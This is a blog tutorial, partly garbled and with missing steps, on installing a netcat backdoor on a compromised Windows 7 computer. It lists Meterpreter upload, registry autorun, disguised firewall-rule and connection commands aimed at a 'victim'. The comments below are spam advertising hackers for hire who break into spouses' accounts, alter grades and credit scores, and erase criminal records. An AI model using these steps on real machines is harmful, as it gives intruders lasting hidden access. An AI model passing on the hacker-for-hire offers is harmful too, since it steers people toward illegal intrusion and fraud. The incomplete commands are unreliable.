How to use netcat as a backdoor in windows system

In this article we are going to use netcat to use as the backdoor particularly in windows system

If a hacker cracks your system once he will create a backdoor just to comeback again this is achieved through netcat.



10 Steps to Use NetCat as a Backdoor in Windows 7 System:


The first step you need to gain an access to victim computer and get a meterpreter script for the payload.



The next step you need to upload your NetCat.exe to victim computer by using following command :



upload /pentest/<strong class="StrictlyAutoTagBold">windows</strong>-binaries/tools/nc.exe C:\\<strong class="StrictlyAutoTagBold">windows</strong>\\system32

upload nc.exe and place it in C:\<strong class="StrictlyAutoTagBold">windows</strong>\system32 on victim <strong class="StrictlyAutoTagBold">computer</strong>

The next step we need to configure the registry to make NetCat execute on Windows start up and listening on port 443. We do this by editing the key “HKLM\software\microsoft\windows\currentversion\run“. Enumerate the supplied registry key :




Continuously Type:
reg enumkey -k <strong class="StrictlyAutoTagBold">HKLM</strong>\\<strong class=
"StrictlyAutoTagBold">software</strong>\\<strong class="StrictlyAutoTagBold"> 
microsoft</strong>\\<strong class="StrictlyAutoTagBold">windows</strong>\\currentversion\\run


Until this step everything looks okay, for the next step we need to alter the system to allow remote connections through the firewall to our netcat backdoor using netsh command and open port 443 . run shell command from meterpreter to access command prompt, and then run :

netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protoco

9. Yep everything has been set up so great until this step, now we will run our netcat to try connect to victim computer by running :

nc -v victim_ip_address port

Let’s try our backdoor by restarting the victim computer by using reboot command from meterpreter or shutdown -r -t 00 from windows console and try again to connect using NetCat in step 9.

<strong class="StrictlyAutoTagBold">meterpreter</strong> &gt; reboot

or

C:\<strong class="StrictlyAutoTagBold">windows</strong>\system32&gt;<strong class="StrictlyAutoTagBold">shutdown</strong> -r -t 00


If our netcat show up a console, then we’re successful inject a NetCat backdoor to victim computer.
Take your time to comment on this article. 

Comments


  1. My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com

    ReplyDelete
  2. Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete

Post a Comment

Popular Posts